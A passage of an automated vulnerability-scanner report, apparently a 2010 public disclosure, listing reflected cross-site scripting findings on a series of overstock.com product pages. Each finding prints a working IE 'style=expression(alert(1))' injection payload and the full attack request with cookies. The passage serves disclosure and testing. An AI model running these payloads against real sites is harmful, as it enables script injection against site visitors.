GET /Home-Garden/Bella-Chaise-Berry/4068267/product.html?3d1cb"style%3d"x%3aexpression(alert(1))"53fd88e1ab5=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.154. http://www.overstock.com/Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28664"style%3d"x%3aexpression(alert(1))"2a92a237479 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 28664"style="x:expression(alert(1))"2a92a237479 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html?28664"style%3d"x%3aexpression(alert(1))"2a92a237479=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.155. http://www.overstock.com/Home-Garden/Bella-Sea-Foam-Brooks-Sofa/4754971/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f699e"style%3d"x%3aexpression(alert(1))"06c80db439f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f699e"style="x:expression(alert(1))"06c80db439f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Bella-Sea-Foam-Brooks-Sofa/4754971/product.html?f699e"style%3d"x%3aexpression(alert(1))"06c80db439f=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.156. http://www.overstock.com/Home-Garden/Black-Wood-Corner-Computer-Desk/2648511/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 185b5"style%3d"x%3aexpression(alert(1))"71644a27043 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 185b5"style="x:expression(alert(1))"71644a27043 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Black-Wood-Corner-Computer-Desk/2648511/product.html?185b5"style%3d"x%3aexpression(alert(1))"71644a27043=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.157. http://www.overstock.com/Home-Garden/Black-and-White-Wing-Recliner/4692750/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ebb4"style%3d"x%3aexpression(alert(1))"ef714e226b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6ebb4"style="x:expression(alert(1))"ef714e226b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Black-and-White-Wing-Recliner/4692750/product.html?6ebb4"style%3d"x%3aexpression(alert(1))"ef714e226b7=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.158. http://www.overstock.com/Home-Garden/Blooming-Prairie-3-Piece-Quilt-Set/3707290/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe84a"style%3d"x%3aexpression(alert(1))"ca3383fac81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fe84a"style="x:expression(alert(1))"ca3383fac81 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Blooming-Prairie-3-Piece-Quilt-Set/3707290/product.html?fe84a"style%3d"x%3aexpression(alert(1))"ca3383fac81=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.159. http://www.overstock.com/Home-Garden/Bodipedic-10-inch-Queen-size-Memory-Foam-Mattress-and-Cover-Set/1150841/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cba57"style%3d"x%3aexpression(alert(1))"8420a7840b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cba57"style="x:expression(alert(1))"8420a7840b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Bodipedic-10-inch-Queen-size-Memory-Foam-Mattress-and-Cover-Set/1150841/product.html?cba57"style%3d"x%3aexpression(alert(1))"8420a7840b1=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.160. http://www.overstock.com/Home-Garden/Bodipedic-3-inch-Memory-Foam-Topper-and-Cover-Set/4107143/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6beca"style%3d"x%3aexpression(alert(1))"46bb046a4c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6beca"style="x:expression(alert(1))"46bb046a4c0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Bodipedic-3-inch-Memory-Foam-Topper-and-Cover-Set/4107143/product.html?6beca"style%3d"x%3aexpression(alert(1))"46bb046a4c0=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.161. http://www.overstock.com/Home-Garden/Buffalo-Tools-Electric-Chain-Saw-Sharpener/4188189/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6080"style%3d"x%3aexpression(alert(1))"7a02a62f1b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d6080"style="x:expression(alert(1))"7a02a62f1b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Buffalo-Tools-Electric-Chain-Saw-Sharpener/4188189/product.html?d6080"style%3d"x%3aexpression(alert(1))"7a02a62f1b8=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.162. http://www.overstock.com/Home-Garden/Cabo-Mocha-Microsuede-Sectional-Sofa-Set/4737201/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c512"style%3d"x%3aexpression(alert(1))"b229728369b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2c512"style="x:expression(alert(1))"b229728369b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Cabo-Mocha-Microsuede-Sectional-Sofa-Set/4737201/product.html?2c512"style%3d"x%3aexpression(alert(1))"b229728369b=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.163. http://www.overstock.com/Home-Garden/Camden-Collection-350-Thread-Count-Egyptian-Cotton-Sheet-Sets/4064078/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f623b"style%3d"x%3aexpression(alert(1))"6c555cb7e50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f623b"style="x:expression(alert(1))"6c555cb7e50 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Camden-Collection-350-Thread-Count-Egyptian-Cotton-Sheet-Sets/4064078/product.html?f623b"style%3d"x%3aexpression(alert(1))"6c555cb7e50=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.164. http://www.overstock.com/Home-Garden/Capri-Print-300-Thread-Count-Duvet-Set/4805795/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc64f"style%3d"x%3aexpression(alert(1))"4fbcfd4b8f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc64f"style="x:expression(alert(1))"4fbcfd4b8f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Capri-Print-300-Thread-Count-Duvet-Set/4805795/product.html?fc64f"style%3d"x%3aexpression(alert(1))"4fbcfd4b8f1=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.165. http://www.overstock.com/Home-Garden/Casseria-8-piece-Comforter-Set/3672338/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83d3e"style%3d"x%3aexpression(alert(1))"fb885b63000 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 83d3e"style="x:expression(alert(1))"fb885b63000 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Casseria-8-piece-Comforter-Set/3672338/product.html?83d3e"style%3d"x%3aexpression(alert(1))"fb885b63000=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.166. http://www.overstock.com/Home-Garden/Chai-Microsuede-Sofa-Bed/1907674/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c63a"style%3d"x%3aexpression(alert(1))"1cfd780e890 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3c63a"style="x:expression(alert(1))"1cfd780e890 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Chai-Microsuede-Sofa-Bed/1907674/product.html?3c63a"style%3d"x%3aexpression(alert(1))"1cfd780e890=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.167. http://www.overstock.com/Home-Garden/Chrome-3-light-Black-Shade-Crystal-Chandelier/4488456/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66523"style%3d"x%3aexpression(alert(1))"edf649f61ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 66523"style="x:expression(alert(1))"edf649f61ee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
